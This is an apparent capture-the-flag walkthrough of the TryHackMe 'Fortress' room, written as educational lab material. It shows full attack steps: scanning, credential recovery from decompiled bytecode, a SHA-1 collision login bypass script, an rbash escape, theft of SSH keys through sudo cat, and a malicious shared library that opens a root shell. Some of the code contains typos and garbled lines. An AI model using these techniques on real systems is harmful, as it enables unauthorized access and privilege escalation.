THM Machine Fortress

Task 1 Introduction

The box contains CTF-based challenges, to-be-solved in a story-driven format. The good part is that story is not related to the hints and you can pull this off without reading through the story... So if you want to skip the boring part and dive right into hacking, you can feel free to.

The format of story is divided into 3 chapters... With each part being revealed as you progress. Each chapter gives you a new challenge and chapter 3 is where you fight the boss, so expect the obvious.

Hint: in this room, there is no need to brute-force any user credentials.

Last but not least... If you feel lost inside the maze, just believe that you're inside the fortress, fully controlled by the evil-devil overlord. If I were you I won't believe everything I see. Remember: Things are not always how they look like. 🙃

Task 2 Prepare for battle

Welcome Chief, the fortress has been undertaken by the so-called overlords... Other clans have retreated their forces from the war observing how quickly they have patched up the weak endings of the fort. Only you can save us now. Go in, and hack the evil leader's fortress, the pacifists are counting on you...

Uhm, chief, make sure you set your radar to point to these mission endpoints:

10.10.20.80 fortress

10.10.20.80 temple.fortress

These are gonna help you get inside the fortress, but once you get in there you're gonna be on your own. "I will pray for you, chief", said the pilot.

Scanning

Nmap scan Report

Nmap Full Ports Scan Report Result

$ nmap -p- $IP_Here

PORT     STATE SERVICE
22/tcp   open  ssh
5581/tcp open  tmosms1
5752/tcp open  unknown
7331/tcp open  swx

Nmap Common Script Scan Results

$ nmap -p 22,5581,5752,7331 -sC $IP_Here
PORT     STATE SERVICE
22/tcp   open  ssh
| ssh-hostkey:
|   2048 9f:d0:bb:c7:e2:ee:7f:91:fe:c2:6a:a6:bb:b2:e1:91 (RSA)
|   256 06:4b:fe:c0:6e:e4:f4:7e:e1:db:1c:e7:79:9d:2b:1d (ECDSA)
|_  256 0d:0e:ce:57:00:1a:e2:8d:d2:1b:2e:6d:92:3e:65:c4 (ED25519)
5581/tcp open  tmosms1
5752/tcp open  unknown
7331/tcp open  swx

Nmap Aggressive Scan Report

$ nmap  -p 22,5581,5752,7331 -A $IP_Here

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9f:d0:bb:c7:e2:ee:7f:91:fe:c2:6a:a6:bb:b2:e1:91 (RSA)
|   256 06:4b:fe:c0:6e:e4:f4:7e:e1:db:1c:e7:79:9d:2b:1d (ECDSA)
|_  256 0d:0e:ce:57:00:1a:e2:8d:d2:1b:2e:6d:92:3e:65:c4 (ED25519)
5581/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           305 Jul 25 20:06 marked.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.186.33
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
5752/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, LANDesk-RC, LPDString, RTSPRequest, SIPOptions, X11Probe:
|     Chapter 1: A Call for help
|     Username: Password:
|   Kerberos, LDAPBindReq, LDAPSearchReq, NCP, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie:
|     Chapter 1: A Call for help
|_    Username:
7331/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)

Conclusion

1. Total Open Ports: 4

2. Port Number: 22, 5581, 5752,7331

3. Services: ssh, ftp, Unknown, http

4. Services Versions: OpenSSH 7.2p2, vsftpd 3.0.3, Unknown, Apache httpd 2.4.18

5. Operating System: Ubuntu

Enumeration

1. Ftp Enumeration

From the Nmap Aggressive Scan Report, we can see ftp has anonymous login allowed so we can login to the ftp server using an anonymous account using the following command

$ ftp $IpAdd_Here 5581
Name: anonymous
Password:

Note: In an anonymous account, you don't need to give a password just press enter there or leave him empty

When we use the ls -al command there we can see there are two files there one is marked.txt and the other is hidden and its name is .file

fortress ftp

We can download that file using the get command there like follows

$ get .file marked.txt

fortress ftp get png

The above command downloads those files to our current directory where we open the ftp server. So now we have that files we can see the content of that files so now we can examine that files to see what is in there .file don't have any extension there so we can use the file command on it to see what the type of file is that like follows

$ file .file

This shows us the file type of the .file file and the other file has the extension .txt, which means that file is a text file so we can see its content using the cat command

fortress ftpFiles png

The text file has text on it but .file is a python 2.7 byte-complied file which means that file is a compiled files of python2 and we can try to decompile it so we can see its source code for getting some useful information. We can use uncompyle2 that decompiles that code, we can do this with the following command

$ git clone https://github.com/wibiti/uncompyle2

$ cd uncompyle2

$ sudo ./setup.py install

$ ./scripts/uncompyle2 ../.file > decompiled.py

This will decompile that code and store its output to the file name decompiled_backdoor.py

fortress ftpFilesDecompile2

fortress ftpFilesDecompileContent

After Decompiling we can see there is usern and passw variable that have bytes_to_long encoded data, we can decode that values to get the usern and passw value, we know they uses bytes_to_long utility to encode it so we can decode it using long_to_bytes with the following python3 code

from Crypto.Util.number import long_to_bytes 
username = "232340432076717036154994" 
password = "10555160959732308261529999676324629831532648692669445488"
print(long_to_bytes((usernameusername)))  
print(long_to_bytes((passwordpassword)))

After running that code we got the username and password values if everything run fine

Username: 1337-h4x0r  
Password: n3v3r_g0nn4_g1v3_y0u_up

1. Port 5752 Enumeration

So there is some service running on port 5752 but we could not get what type of service is running on that port so to get that we could use netcat or nc to connect to that service that way we probably find something interesting. To connect to that we can use the following command

$ nc $IpAdd_Here 5752

When we do that we see the following output

fortress nc

So there we see we need a username and password and we find credentials on ftp enumeration we can use that credentials there and see if they accept those credentials or not.

fortress nc result

And they do accept it and we got some output t3mple_0f_y0ur_51n5 they may be some kind of secret string that may use in some other place.

1. HTTP Enumeration

Above we do an enumeration of the service that got us some information. Now we enumerate the web server that has a big attack surface. In enumeration, we found out that Target is using an Apache web server. When we visit the main page of the site we confirm that also because they show us Apache default web page.

fortressHttppage

So Now start finding hidden directories the target contained in the server. To find that we can use the following command

$ ffuf -w ~/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://10.10.127.125:7331/FUZZ -e .php,.html,.js,.css -ic

• -w is use to specify wordlist

• :FUZZ is the keyword for ffuf

• -u is used to specify the target URL

• FUZZ is the keyword for ffuf to specify which place they have to fuzz

• -e is used to specify the extension

• -ic is used to ignore comments

and the output has the following things in it

index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
assets                  [Status: 301, Size: 322, Words: 20, Lines: 10]
private.php             [Status: 200, Size: 0, Words: 1, Lines: 1]
troll.html              [Status: 200, Size: 199, Words: 11, Lines: 12]

There we see index.html that we see above the Apache default page, assets is a directory that we don't access, private.php is a page that doesn't have any content in it they are just a blank page or requires some additional things. And troll.html is a web page we can access but when we go there they show just a blank page with a black background they have some content in it because from above we see they have size 199 so we can view its source code and they are like the following.

fortressHttppageTroll

there we see a message This is not so easy and there is also a link of assests/style.css that has some base64 encoded message. When we decode that message using the following command syntax

$ echo 'Base64 string here' | base64 -d

Output is like this

fortressMessage

There we see some kind of ancient words that I don't know their purpose. One thing to note the word COLLIDING is in upper case.

That's all we find right now and they are not enough. We find a string from service running on port 5752. Maybe they are HTTP hidden directories we can find this also using ffuf we have to make a file that has a string we find from that service and use that as a wordlist like follows

$ ffuf -u http://10.10.238.81:7331/FUZZ -w tample.txt:FUZZ -e .php,.html,.js,.css

And the output is like following

fortress_tampleofsins

So this is a hidden directory with two extensions html and php. The t3mple_0f_y0ur_51n5.html is looks like the following.

fortress_tampleofsins html

Their source code has an interesting thing. They comment out a php code there

fortress_tampleofsins htmlSource

Let's see t3mple_0f_y0ur_51n5.php on page. That page has nothing just a black background when I see its source code that also has some interesting thing

fortress_tampleofsins php

They commented some login forum that uses the GET Request Method with the parameters user that has a username and pass that has a password.

After reading the php code we came to know They get input from the user about username and password and save it in a variable test1 and test2 and encode it in hex using bin2hex and compare that using if-else statement but we focus on the following code conditions.

 else if (sha1($test1) === sha1($test2)) {
      print "<pre>'Private Spot: '$spot</pre>";
    }

So basically they compare the test1 variable with test2 if they have the same sha1 hash then they will print some private spot information. We cannot pass the same username and password string because of the following check in the code.

 if ($test1 == $test2) {
        print 'You can't cross the gates of the temple, GO AWAY!!.';
    }

Above we see we have to pass different username and password values but those values should have the same sha1 hash. As far as I know, Hashing is a thing that will generate a fixed length of characters or string called digest by evaluating some mathematical operations on the file and two different files or data don't have the same hash because the mathematical operation gives a different result based on data. That's the rule for hashing so after googling "Can the different files have the same SHA1 hash". I came to know yes because SHA1 has a vulnerability name hash collision in which two different files can have the same sha1 hash. When googling more about it I found that the video is useful to learn more about the hash collision attack

Hash Collision Attack

So now I know why the/assets/style.css file message writes COLLIDING in upper case letters

Now we have to send two different usernames and password strings as GET parameters of username and password they have a length in between 500 and 600 because of the following conditions.

else if(strlen($test2) <= 500 and strlen($test1) <= 600){
    	print "<pre>Nah, babe that ain't gonna work</pre>";
    }

Keep that in mind, we have to send small hash collision strings that have a small size but have the same sha1 hash after more Googling I found this site useful things related to hash collision attacks.

https://sha-mbles.github.io/

The above site has two message files that have the same hash.

fortress_Shambles

After downloading that file it was found that files have the same sha1 hash and also have a small size.

.

Now we have the files that can be used but there is a problem with how we send that files to the server with username and password parameters To solve that problem I use the following python3 code that uses requests the library to send the request with that conditions.

import requests
import urllib.request, urllib.error, urllib.parse
username = urllib.request.urlopen("https://sha-mbles.github.io/messageA").read();
password = urllib.request.urlopen("https://sha-mbles.github.io/messageB").read();

r = requests.get('http://10.10.238.81:7331/t3mple_0f_y0ur_51n5.php', params={'user': username, 'pass': password});
print(r.text)

In that code, we request the messageA and messageB files with their complete URL from sha-mbles.io and read those files and store their content to the variable name username and password and send it to the server.

With the GET parameter user for username and pass for password and when that code runs they show us the following output

fortress_ShamblesHashKey

They give us a directory name that has the following content.

fortress_SSHKey

There they have some messages for j4x0n and h4rdy private key. That key is use to login to the system using ssh for the h4rdy user. We can copy that key in a file and make that private key with the permissions that only we can read it using the following commands

$ echo 'private key here' > h4rdy_rsa
$ chmod 600 h4rdy_rsa

So now we can get initial access to the system

Initial Access

As we have the h4rdy ssh private key so we can login to its user using the following command

$ ssh -i h4rdy_rsa h4rdy@10.10.238.81

And now we got the initial access

when we use the ls command there we got the following errors

fortress_SSH4rdy

This user has a default shell set to rbash which is a restricted shell that restricts us to run some specified commands only but they have some bypasses when googling it and found the following method useful.

fortress_rbash

Following the above steps we can bypass rbash restriction and login with a low-privilegenormal shell using the following command.

$ ssh -i h4rdy_rsa h4rdy@10.10.110.53 -t "bash --noprofile"

This gives us regular bash but they don't have any PATH or env set so we have to do this on our own.

fortress_rbashbypass

There we use the following command to add the PATH

$ export PATH=/bin:/usr/bin

This adds the PATH so now we can use the commands as we do

Privilege Escalation

Now we have low privilege access the next step is to do Privilege escalation to get higher privilege in the system. For that, we can start with the sudo -l command and they show us the following output

Matching Defaults entries for h4rdy on Fortress:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User h4rdy may run the following commands on Fortress:
    (j4x0n) NOPASSWD: /bin/cat

The above result shows the user h4rdy can use the cat command with no password as a j4x0n user and that's nice for us because if h4rdy don't have a user.txt flag j4x0n must have that file. Knowing that we can use cat command to read user.txt flag

$ sudo -u j4x0n cat /home/j4x0n/user.txt

So we can successfully see that flag that only the j4x0n user can read. We can also read the j4x0n user ssh private key with the following command.

$ sudo -u j4x0n cat /home/j4x0n/.ssh/id_rsa

fortress_jaxonkey

Now we also have the j4x0n private key that also is used to login to its account. Using the following command steps

$ echo 'private key here' > j4x0n_rsa
$ chmod 600 j4x0n_rsa

$ ssh -i j4x0n_rsa   j4x0n@10.10.238.81

fortress_jaxon

We successfully login to j4xon user this is horizontal privilege escalation.

Now we can use sudo -l also for easy privilege escalation vectors but they required a password that we don't have at this time. we can use find command to find a system SUID binaries to know if there are any binaries that are using SUID bitset using the following command.

$ find / -perm /4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 615496 Jul 25 21:21 /usr/local/bin/sudo
-rwsr-xr-x 1 root root 14864 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 May 27  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 12  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84120 Apr 10  2019 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 54256 Mar 27  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 20  2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 32944 Mar 27  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 40432 Mar 27  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 39904 Mar 27  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 Mar 27  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 Mar 27  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 23376 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 71824 Mar 27  2019 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 51464 Jan 15  2016 /usr/bin/at
-rwsrwxr-x 1 root root 16696 Jul 26 12:55 /opt/bt
-rwsr-xr-x 1 root root 44680 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 Jan 27  2020 /bin/umount
-rwsr-xr-x 1 root root 44168 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 40152 Jan 27  2020 /bin/mount
-rwsr-xr-x 1 root root 40128 Mar 27  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 1000608 Apr 21 23:44 /sbin/ldconfig.real

There we see lots of binary that has SUID bit set but they are basic to linux system except for /opt/bt that's a new binary that is not come by default in linux Operating systems. when I run it to find what it does it's kind of a booby trap they show output like this

Root Shell Initialized...
Exploiting kernel at super illuminal speeds...
Getting Root...
Bwahaha, You just stepped into a booby trap XP

After that, they crash my terminal with some junk and I cannot do anything there now. I have to close my terminal and open a new one and login again. I use strings commands on it like the following.

$ j4x0n@fortress:~$ strings /opt/bt

/lib64/ld-linux-x86-64.so.2
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
puts
sleep
__cxa_finalize
__libc_start_main
libfoo.so
libc.so.6
GLIBC_2.2.5
u/UH
[]A\A]A^A_
Root Shell Initialized...
Exploiting kernel at super illuminal speeds...
Getting Root...
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
main.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
_edata
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
sleep@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

In the above output, we see some file name libfoo.so, andlibc.so.6 that are linked files to that binary. I use the find command to know its location.

$ find / -name libfoo.so -exex ls -al {} \; 2>/dev/null

From the above command result, I came to know that file is owned by j4x0n user. The /bin/bt binary has an SUID permission and they are using a linked library that is owned by our user sounds interesting. If we see hacktrix privilege escalation notes we see there are methods related to this by following that I made a malicious libfoo.so with the following steps.

• First, we have to make a file name libfoo.c with the following code

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h> 
int foo() { 
setgid(0); 
setuid(0); 
system("/bin/bash"); 
}

• After that, we have to compile that file with the following command

$ gcc -fPIC -shared -o libfoo.so libfoo.c

They give us the file libfoo.so with malicious code

fortress_JaxonPri-EscBinaryLocation

Now we can copy our malicious binary in the actual location using the following command

$ cp /home/j4x0n/libfoo.so /usr/lib

After that, we run that binary and they give us a root shell.

fortressRoot

Now read the root flag using the following command and solve the room.

# cat /root/root.txt

---